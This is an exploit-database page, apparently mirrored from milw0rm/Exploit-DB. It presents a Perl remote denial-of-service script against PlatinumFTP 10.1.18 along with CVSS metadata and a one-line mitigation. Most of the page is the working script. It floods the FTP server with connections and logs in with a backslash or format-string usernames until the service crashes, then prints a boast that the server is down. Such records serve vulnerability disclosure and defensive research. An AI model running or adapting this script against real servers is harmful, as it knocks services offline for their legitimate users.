header-logo
Suggest Exploit
vendor:
PlatinumFTP
by:
ports at securityforest dot com
5.5
CVSS
MEDIUM
Denial of Service
CWE
Product Name: PlatinumFTP
Affected Version From: PlatinumFTP version 10.1.18
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2005

Remote Denial of Service against PlatinumFTP 10.1.18

This script is a remote Denial of Service (DoS) exploit against PlatinumFTP version 10.1.18. It takes advantage of a vulnerability in the FTP server to crash it. The exploit works by repeatedly creating new FTP connections to the server and attempting to login with a specific username. By doing this, the server becomes overwhelmed and crashes, resulting in a denial of service for legitimate users.

Mitigation:

Upgrade to a patched version of PlatinumFTP or switch to a different FTP server software.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# pftpdos-ai1.pl - Remote DoS against PlatinumFTP 10.1.18
# Details:http://seclists.org/lists/bugtraq/2005/Mar/0222.html
#
# If you don't get the server down try to change/play a little bit with
# the Timeout
#
# ports at securityforest dot com | greetings to muts, barabas, s|33py,
# revised and all guys at www.whitehat.co.il
#
# Thanks to str0ke from milw0rm for forcing me to shrink 3 PoCs into 1 :)
#
# 2005/05/03 portsonline.net

use strict;
use Net::FTP;

my $host;
my $username;
my $dostype;

if ($#ARGV < 1) { &syntax(); }

$host = $ARGV[0];
$dostype = $ARGV[1];

if ($dostype == '1') { $username = '\\'; }
if ($dostype == '2') { $username = '%s%s%s%s'; }
if ($dostype == '3') { $username = '%.1024d'; }

my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21)
or die "can you see a ftp server? i can't.\n";

print "denial of service tpye $dostype in progress\n";

while (my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21))
{
    my $ftp = Net::FTP->new($host, Timeout => 0.1, Debug => 0, Port => 21);
    $ftp->login($username);
}

print "server is down. now run forest, RUN!\n";

sub syntax {
    print "Usage: pftpdos-ai1.pl IP DOSTYPE(1-3)\n\n";
    print "DOSTYPE: 1 Using '\\' Username \n";
    print "DOSTYPE: 2 Using '%s%s%s%s' Username \n";
    print "DOSTYPE: 3 Using '%.1024d' Username \n";
    exit (1);
}

# milw0rm.com [2005-03-17]

Navigation

Suggest Exploit

Services By CQR